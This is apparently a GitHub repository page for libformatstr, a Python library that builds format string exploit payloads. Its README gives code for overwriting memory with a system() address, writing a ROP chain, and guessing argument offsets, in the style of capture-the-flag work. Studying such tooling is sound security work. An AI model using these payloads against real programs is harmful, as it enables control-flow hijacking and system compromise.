Simplify format string exploitation.
Python C Makefile
Latest commit 4ad3997 Nov 20, 2015 @hellman switch to MIT license
Permalink
Failed to load latest commit information.
libformatstr support for writing single bytes Feb 15, 2015
selftest libformatstr selftest Feb 15, 2015
README.md switch to MIT license Nov 20, 2015
setup.py switch to MIT license Nov 20, 2015

README.md

libformatstr.py

Small script to simplify format string exploitation.

Usage

  • Case 1 - replace one dword:
import sys
from libformatstr import FormatStr

addr = 0x08049580
system_addr = 0x080489a3

p = FormatStr()
p[addr] = system_addr

# buf is 14th argument, 4 bytes are already printed
sys.stdout.write( p.payload(14, start_len=4) )
  • Case 2 - put ROP code somewhere:
import sys
from libformatstr import FormatStr

addr = 0x08049580
rop = [0x080487af, 0x0804873c, 0x080488de]
p = FormatStr()
p[addr] = rop

sys.stdout.write( p.payload(14) )
  • Case 3 - guess argument number and padding:
import sys
from libformatstr import FormatStr

# let's say we have do_fmt function,
# which gives us only output of format string
# (you can also just copy fmtstr and output manually)

buf_size = 250  # fix buf_size to avoid offset variation
res = do_fmt(make_pattern(buf_size))
argnum, padding = guess_argnum(res, buf_size)

# of course you can use it in payload generation

p = FormatStr(buf_size)
p[0xbffffe70] = "\x70\xfe\xff\xbf\xeb\xfe"  # yes, you can also put strings

sys.stdout.write( p.payload(argnum, padding, 3) ) # we know 3 bytes were printed already

About

Author: hellman ( hellman1908@gmail.com )

License: MIT License ( http://opensource.org/licenses/MIT )